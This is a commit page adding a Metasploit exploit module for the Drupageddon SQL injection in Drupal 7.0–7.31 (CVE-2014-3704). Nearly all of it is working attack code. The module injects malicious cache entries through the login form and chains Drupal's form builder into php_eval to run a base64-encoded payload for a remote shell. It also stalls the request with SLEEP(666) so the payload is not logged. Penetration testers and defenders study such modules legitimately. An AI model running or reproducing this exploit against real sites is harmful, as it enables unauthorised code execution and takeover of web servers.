New exploit method for Drupageddon (CVE-2014-3704)

WhiteWinterWolf · web-flow · commit 704514a4205f · 2017-11-16T20:47:44.000+01:00
This new script exploits the same vulnerability as
 *exploits/multi/http/drupal_drupageddon.rb*, but in a more efficient way.
diff --git a/modules/exploits/multi/http/drupal_cve2014_3704.rb b/modules/exploits/multi/http/drupal_cve2014_3704.rb
@@ -0,0 +1,146 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+#
+# For technical details on the exploit implemented here, see:
+# https://www.whitewinterwolf.com/posts/2017/11/16/drupageddon-revisited-a-new-path-from-sql-injection-to-remote-command-execution-cve-2014-3704/
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Drupal HTTP Parameter Key/Value SQL Injection',
+      'Description'    => %q{
+        This module exploits the Drupal HTTP Parameter Key/Value SQL Injection
+        (aka Drupageddon) in order to achieve a remote shell on the vulnerable
+        instance. This module was tested against Drupal 7.0 and 7.31 (was fixed
+        in 7.32).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'SektionEins',          # discovery
+          'WhiteWinterWolf',      # msf module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2014-3704'],
+          ['URL', 'https://www.drupal.org/SA-CORE-2014-005'],
+          ['URL', 'http://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html']
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['Drupal 7.0 - 7.31',{}]],
+      'DisclosureDate' => 'Oct 15 2014',
+      'DefaultTarget'  => 0,
+      'Payload'        =>
+        {
+          # Rough estimate, maximum HTTP header size is server dependant.
+          'Space'          => 7000,
+          # Don't pad the payload with 6K space chars.
+          'MaxNops'        => 0,
+        },
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "The target URI of the Drupal installation", '/'])
+      ])
+
+    register_advanced_options(
+      [
+        OptInt.new('WAIT', [true, "Number of seconds to wait before triggering the payload sent.", 5])
+      ])
+  end
+
+  def sql_insert(id, value)
+    curlyopen = rand_text_alphanumeric(8)
+    curlyclose = rand_text_alphanumeric(8)
+    value.gsub!('{', curlyopen)
+    value.gsub!('}', curlyclose)
+
+    "INSERT INTO {cache_form} (cid, data, expire, created, serialized) " \
+      + "VALUES ('#{id}', REPLACE(REPLACE('#{value}', '#{curlyopen}', " \
+      + "CHAR(#{'{'.ord})), '#{curlyclose}', CHAR(#{'}'.ord})), -1, 0, 1);"
+  end
+
+  def exploit
+    form_build_id = 'form-' + rand_text_alphanumeric(43)
+
+    # Remove the malicious cache entries upon success.
+    evalstr = "cache_clear_all(array('form_" + form_build_id + "', " \
+      + "'form_state_" + form_build_id + "'), 'cache_form');"
+    evalstr << payload.encoded
+    evalstr = Rex::Text.encode_base64(evalstr)
+    # '<?php' tag required by php_eval().
+    evalstr = "<?php eval(base64_decode(\\'#{evalstr}\\'));"
+    # Don't count the backslashes.
+    evalstr_len = evalstr.length - 2
+
+    # Serialized malicious form state.
+    # The PHP module may be disabled (and should be).
+    # Load its definition manually to get access to php_eval().
+    state = 'a:1:{s:10:"build_info";a:1:{s:5:"files";a:1:{'
+      state << 'i:0;s:22:"modules/php/php.module";'
+    state << '}}}'
+    # Initiates a POP chain in includes/form.inc:1850, form_builder()
+    form = 'a:6:{'
+      form << 's:5:"#type";s:4:"form";'
+      form << 's:8:"#parents";a:1:{i:0;s:4:"user";}'
+      form << 's:8:"#process";a:1:{i:0;s:13:"drupal_render";}'
+      form << 's:16:"#defaults_loaded";b:1;'
+      form << 's:12:"#post_render";a:1:{i:0;s:8:"php_eval";}'
+      form << 's:9:"#children";s:' + evalstr_len.to_s + ':"' + evalstr + '";'
+    form << '}'
+
+    # SQL injection key lines:
+    # - modules/user/user.module:2149, user_login_authenticate_validate()
+    # - includes/database/database.inc:745, expandArguments()
+    sql = sql_insert('form_state_' + form_build_id, state)
+    sql << sql_insert('form_' + form_build_id, form)
+    # Causes PHP script to timeout, avoiding payload logging.
+    sql << 'SELECT SLEEP(666);'
+
+    # Use the login form to inject the malicious cache entry.
+    # '!' follows redirects, used by some Drupal sites to enforce clean URLs.
+    # Don't check the return code as it *will* timeout.
+    send_request_cgi!({
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'POST',
+      'vars_post' => {
+        # Don't use 'user_login_block' as it may be disabled.
+        'form_id' => 'user_login',
+        'form_build_id' => '',
+        "name[0;#{sql}#]" => '',
+        # This field must be located *after* the injection.
+        "name[0]" => '',
+        'op' => 'Log in',
+        'pass' => Rex::Text.rand_text_alpha(8)
+      },
+      'vars_get' => {
+        'q' => 'user/login'
+      }
+    }, timeout=datastore['WAIT'])
+
+    # Trigger the malicious cache entry using its form ID.
+    send_request_cgi!({
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'POST',
+      'vars_post' => {
+        'form_id' => 'user_login',
+        "form_build_id" => form_build_id,
+        "name" => Rex::Text.rand_text_alpha(10),
+        'op' => 'Log in',
+        'pass' => Rex::Text.rand_text_alpha(10)
+      },
+      'vars_get' => {
+        'q' => 'user/login'
+      }
+    })
+  end
+end
